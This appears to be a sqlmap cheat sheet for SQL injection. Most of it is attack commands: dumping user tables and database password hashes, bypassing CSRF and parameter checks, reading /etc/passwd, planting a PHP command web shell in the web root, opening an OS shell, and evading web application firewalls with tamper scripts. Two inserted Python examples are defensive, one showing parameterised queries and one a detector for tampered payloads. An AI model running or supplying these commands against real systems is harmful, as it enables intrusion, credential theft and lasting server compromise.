sqlmap

// sqlmap tips
Display Errors

The first step is usually to switch on --parse-errors, which parses the DBMS
errors (if any) and displays them as part of the program run:
sqlmap -u "http://www.target.com/vuln.php?id=1" --parse-errors

// The -t option stores the whole traffic content to an output file:
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt

// Another useful flag is the -v option, which raises the verbosity level of
// the console output:
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

// As we can see, -v 6 directly prints all errors and the full HTTP requests
// to the terminal, so that we can follow along with everything SQLMap is
// doing in real time.

// Finally, we can utilize the --proxy option to redirect the whole traffic through
// a (MiTM) proxy (e.g., Burp). This routes all SQLMap traffic through Burp,
// so that we can later manually investigate all requests, repeat them, and
// utilize all features of Burp with these requests (127.0.0.1:8080 is Burp's
// default listener):
sqlmap -u "http://www.target.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"

Prefix and Suffix

// Boundaries (e.g. '<vector>-- -): prefix and suffix formations,
// used for proper injection of the vector into the vulnerable SQL statement.

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

// This will result in an enclosure of all vector values between the
// static prefix %')) and the suffix -- -, matching a vulnerable statement such as:

$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
$result = mysqli_query($link, $query);
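To see why %')) and -- - are the right boundaries for that statement, here is an added example (not from the page and not sqlmap code) that rebuilds the PHP query's concatenation in Python against an in-memory SQLite table standing in for the MySQL users table, and puts the parameterised form beside it; the table rows are constructed.

```python
import sqlite3

# Constructed rows standing in for the page's `users` table (assumption: SQLite
# in memory instead of MySQL; the LIKE and LIMIT 0,1 syntax used here is shared).
SAMPLE_USERS = [(1, "alice", "smith"), (2, "bob", "jones")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def build_query_unsafe(q):
    # Same concatenation as the PHP above: the raw `q` value lands inside (('...'))
    return "SELECT id,name,surname FROM users WHERE id LIKE (('" + q + "')) LIMIT 0,1"

def lookup_unsafe(conn, q):
    return conn.execute(build_query_unsafe(q)).fetchall()

def lookup_safe(conn, q):
    # Hardened form: the value is bound as a parameter, so quotes and comment
    # markers inside it are data, never SQL syntax.
    sql = "SELECT id,name,surname FROM users WHERE id LIKE ((?)) LIMIT 0,1"
    return conn.execute(sql, (q,)).fetchall()

# sqlmap's boundary from the command above, with no vector in between: the prefix
# %')) closes the LIKE's quote and both parentheses, the suffix -- - comments out
# everything that follows (including the LIMIT).
BOUNDARY_ONLY = "%')) -- -"

if __name__ == "__main__":
    conn = make_db()
    print(build_query_unsafe(BOUNDARY_ONLY))
    print("unsafe:", lookup_unsafe(conn, BOUNDARY_ONLY))  # every row, LIMIT gone
    print("safe:  ", lookup_safe(conn, BOUNDARY_ONLY))    # nothing matches literally
```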


Level and Risk

The option --level (1-5, default 1) extends both vectors and boundaries being used,
based on their expectancy of success (i.e., the lower the expectancy,
the higher the level).

The option --risk (1-3, default 1) extends the used vector set based on their risk
of causing problems at the target side (i.e., risk of database entry loss or
denial-of-service).

sqlmap -u www.example.com/?id=1 -v 3 --level=5

// As for the number of payloads, by default (i.e. --level=1 --risk=1) the number
// of payloads used for testing a single parameter goes up to 72, while in the
// most detailed case (--level=5 --risk=3) the number increases to 7,865.

As SQLMap is already tuned to check for the most common boundaries and vectors, 
regular users are advised not to touch these options because it will make 
the whole detection process considerably slower. Nevertheless, in special cases 
of SQLi vulnerabilities, where usage of OR payloads is a must 
(e.g., in case of login pages), we may have to raise the risk level ourselves.

This is because OR payloads are inherently dangerous in a default run: where the
underlying vulnerable SQL statement (less commonly) actively modifies database
content (e.g. DELETE or UPDATE), an always-true OR condition applies that change
to every row.

Techniques

// Restrict detection to specific techniques (B = boolean-based blind,
// E = error-based, U = UNION query-based; S, T and Q select stacked queries,
// time-based blind and inline queries):
--technique=BEU

Enumeration usually starts with the retrieval of the basic information:

    Database version banner (switch --banner)
    Current user name (switch --current-user)
    Current database name (switch --current-db)
    Checking if the current user has DBA (administrator) rights (switch --is-dba)
    

// narrow down
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

// search table names
// searching tables LIKE 'user'
sqlmap -u "http://www.example.com/?id=1" --search -T user

// search column names
sqlmap -u "http://www.example.com/?id=1" --search -C pass
 
// DB Users Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --passwords --batch

//CSRF
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

// unique value bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI

// calculated parameter bypass
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
 
 
// proxy
--proxy="socks4://177.39.187.70:33283"

// check if DBA
sqlmap -u "http://www.example.com/?id=1" --is-dba

// reading local files
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

// write file
echo '<?php system($_GET["cmd"]); ?>' > shell.php

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

sqlmap -u "http://www.example.com/?id=1" --os-shell

Tamper Scripts

// --tamper=<script>[,<script>...] applies the chosen transformations to every payload

Tamper-Script               Description
0eunion                     Replaces instances of UNION with e0UNION
base64encode                Base64-encodes all characters in a given payload
between                     Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #
commalesslimit              Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart
equaltolike                 Replaces all occurrences of operator equal (=) with LIKE counterpart
halfversionedmorekeywords   Adds (MySQL) versioned comment before each keyword
modsecurityversioned        Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned    Embraces complete query with (MySQL) zero-versioned comment
percentage                  Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat                 Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart
randomcase                  Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
space2comment               Replaces space character (' ') with comments '/**/'
space2dash                  Replaces space character (' ') with a dash comment (--) followed by a random string and a new line ('\n')
space2hash                  Replaces (MySQL) instances of space character (' ') with a pound character (#) followed by a random string and a new line ('\n')
space2mssqlblank            Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
space2plus                  Replaces space character (' ') with plus (+)
space2randomblank           Replaces space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical             Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
versionedkeywords           Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords       Encloses each keyword with (MySQL) versioned comment
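The flip side of the table above is detection: a filter that only matches the literal string UNION SELECT misses every one of these variants. The following is an added example (not from the page, not sqlmap code) of a hypothetical normaliser that undoes the listed transformations before signature matching; the tampered sample values are constructed by hand from the descriptions above, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical normaliser (added example): reverses the tamper-script rewrites
# listed above so a simple signature still fires on the tampered payload.
VERSIONED = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)    # /*!50000UNION*/ -> UNION
COMMENT = re.compile(r"/\*.*?\*/", re.S)               # /**/            -> space
LINE_COMMENT = re.compile(r"(--|#)[^\n]*(\n|$)")       # --abc\n, #abc\n -> space
ZERO_E = re.compile(r"(\d)e0(?=UNION)", re.I)          # 1e0UNION        -> 1 UNION

SIGNATURES = [
    r"\bUNION\b(\s+ALL)?\s+SELECT\b",
    r"\b(AND|OR)\s+\d+\s*=\s*\d+",
    r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b",
]

def normalize_payload(raw):
    """Return a canonical upper-case, single-spaced form of a parameter value."""
    s = unquote_plus(raw)                                # percent-encoding, space2plus
    s = VERSIONED.sub(r" \1 ", s)                        # versionedkeywords, modsecurity*versioned
    s = COMMENT.sub(" ", s)                              # space2comment
    s = LINE_COMMENT.sub(" ", s)                         # space2dash, space2hash
    s = s.replace("&&", " AND ").replace("||", " OR ")   # symboliclogical
    s = ZERO_E.sub(r"\1 ", s)                            # 0eunion
    return re.sub(r"\s+", " ", s).strip().upper()        # randomcase, space2randomblank

def looks_like_sqli(raw):
    norm = normalize_payload(raw)
    return any(re.search(p, norm) for p in SIGNATURES)

# Constructed samples of what each tamper script would emit for "1 UNION SELECT 1,2"
# or "1 AND 1=1"; not real captured requests.
TAMPERED = {
    "space2comment":     "1/**/UNION/**/SELECT/**/1,2",
    "randomcase":        "1 uNiOn SeLeCt 1,2",
    "versionedkeywords": "1+/*!50000UNION*/+/*!50000SELECT*/+1,2",
    "space2dash":        "1--xyz\nUNION--abc\nSELECT--q\n1,2",
    "symboliclogical":   "1 && 1=1",
    "0eunion":           "1e0UNION SELECT 1,2",
}
BENIGN = ["O'Reilly", "100% cotton", "user@example.com"]

if __name__ == "__main__":
    for name, value in TAMPERED.items():
        print(f"{name:20} {normalize_payload(value)!r:28} sqli={looks_like_sqli(value)}")
```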
